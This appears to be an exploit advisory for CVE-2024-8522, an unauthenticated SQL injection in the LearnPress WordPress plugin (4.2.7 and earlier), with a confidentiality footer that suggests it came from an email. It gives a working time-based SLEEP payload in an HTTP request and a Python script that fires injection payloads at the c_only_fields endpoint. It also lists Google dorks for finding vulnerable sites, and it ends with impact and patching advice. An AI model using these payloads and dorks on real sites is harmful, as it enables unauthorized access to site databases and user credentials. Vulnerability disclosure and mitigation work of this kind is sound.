# Exploit Title: LearnPress WordPress LMS Plugin 4.2.7 - SQL Injection
# Google Dork: inurl:"/wp-json/learnpress/v1/" OR inurl:"/wp-content/plugins/learnpress/" OR "powered by LearnPress" AND "version 4.2.7"
# Date: [Current Date, e.g., October 30, 2024]
# Exploit Author: [Your Name or Username]
# Vendor Homepage: https://thimpress.com/learnpress/
# Software Link: https://wordpress.org/plugins/learnpress/
# Version: <= 4.2.7
# Tested on: WordPress 6.x, Ubuntu 22.04
CVE : CVE-2024-8522CVE-2024-8522 - SQL Injection in LearnPress WordPress Plugin (Python exploit)
Overview
CVE: CVE-2024-8522
Plugin: LearnPress – WordPress LMS Plugin (version <= 4.2.7)
Type: SQL Injection
Impact: High
Affected Component: Unauthenticated endpoint parameter c_only_fields in LearnPress API
Description
The vulnerability exists in the LearnPress WordPress plugin, versions up to 4.2.7. An unauthenticated SQL Injection flaw is present in the c_only_fields parameter of the LearnPress API endpoint. This flaw allows attackers to execute arbitrary SQL commands by manipulating API requests without authentication. If exploited, this could lead to unauthorized database access, potentially exposing sensitive data or even allowing administrative control through database manipulation.
Affected Code Path
The vulnerability is triggered by accessing the LearnPress API and injecting SQL commands through the c_only_fields parameter. Below is the code path leading to this vulnerability:
plaintext
class-lp-db.php:702, LP_Database->execute()
class-lp-course-db.php:564, LP_Course_DB->get_courses()
Courses.php:241, LearnPress\Models\Courses::get_courses()
class-lp-rest-courses-v1-controller.php:502, LP_Jwt_Courses_V1_Controller->get_courses()
class-wp-rest-server.php:1230, WP_REST_Server->respond_to_request()
class-wp-rest-server.php:1063, WP_REST_Server->dispatch()
Proof of Concept (PoC)
The vulnerability can be demonstrated by sending a request to the API endpoint with a malicious payload in the c_only_fields parameter. Below is an example of an HTTP request that injects a conditional SQL statement to test for vulnerability by causing a time delay:
http
GET /wp-json/learnpress/v1/courses?c_only_fields=IF(COUNT(*)!=-2,(SLEEP(10)),0) HTTP/1.1
Host:
targetwebsite.com
User-Agent: curl/7.81.0
Accept: */*
Exploitation Script
The following Python script automates the process of sending malicious requests to test for this SQL injection vulnerability by measuring response time, indicating potential success if there is a delay.
python
import requests
import time
# Target URL for the API endpoint
url = '
http://targetwebsite.com/wp-json/learnpress/v1/courses
'
# SQL injection payloads
payloads = [
"IF(COUNT(*) > 0, SLEEP(10), 0)", # Test for successful injection
"IF(1=1, SLEEP(10), 0)", # Basic true condition
"IF(1=2, SLEEP(10), 0)", # Basic false condition
]
# Iterate over payloads and measure response time
for payload in payloads:
params = {'c_only_fields': payload}
start_time = time.time() # Record start time
try:
# Send request to the vulnerable endpoint
response = requests.get(url, params=params)
# Calculate response time
response_time = time.time() - start_time
# Display result
print(f"Payload: {payload} | Status Code: {response.status_code} | Response Time: {response_time:.2f} seconds")
# Check for delay indicative of a successful SQL injection
if response_time > 10:
print("Potential SQL Injection vulnerability detected (delay observed).")
else:
print("No delay observed; injection may be unsuccessful.")
except requests.exceptions.RequestException as e:
print(f"Error during request: {e}")
Google Dorks for Identifying Vulnerable Sites
To locate potentially vulnerable websites running LearnPress, the following Google dorks can help identify sites with the plugin:
inurl:"/wp-content/plugins/learnpress/"
inurl:"/wp-json/learnpress/v1/"
"powered by LearnPress" AND "version 4.2.7"
inurl:"/wp-content/plugins/learnpress/assets/js/"
"LearnPress" AND "WordPress LMS Plugin"
Disclaimer: Use of these dorks should only be conducted in an ethical manner, with proper permissions for testing on identified sites.
Impact Analysis
If exploited, this SQL Injection vulnerability can have severe impacts, including:
Data Breach: Unauthorized access to sensitive data within the WordPress database, such as user credentials, course data, and personal information.
Privilege Escalation: An attacker may leverage the SQL injection to modify database entries, potentially elevating user roles and gaining administrative access.
Site Defacement or Service Disruption: By altering content or database configurations, attackers can disrupt service availability or deface the website.
Recommendations
Immediate Update: Update the LearnPress plugin to a patched version when available.
Web Application Firewall (WAF): Employ a WAF that can filter and block malicious SQL injection attempts.
Least Privilege Access: Configure database users with the minimum necessary privileges to reduce potential impacts.
Conclusion
The SQL Injection vulnerability in LearnPress (<= 4.2.7) is a high-severity issue that exposes affected WordPress sites to data breaches, privilege escalation, and potential service disruption. It is crucial for site administrators using this plugin to update to a secure version and implement protective measures.
This report summarizes the vulnerability, exploitation methods, and recommendations to mitigate risks associated with CVE-2024-8522.
Este mensaje, incluyendo sus anexos, puede contener información clasificada como
confidencial dentro del marco del Sistema de Gestión de la Seguridad corporativo.
Si usted no es el destinatario, le rogamos lo comunique al remitente y
proceda a borrarlo, sin reenviarlo ni conservarlo, ya que su uso no
autorizado está prohibido legalmente.
This message including any attachments may contain confidential information,
within the framework of the corporate Security Management System.
If you are not the intended recipient, please notify the sender and
delete this message without forwarding or retaining a copy, since any
unauthorized use is strictly prohibited by law.
Enviado con el correo electrónico seguro de [Proton Mail](https://proton.me/mail/home).
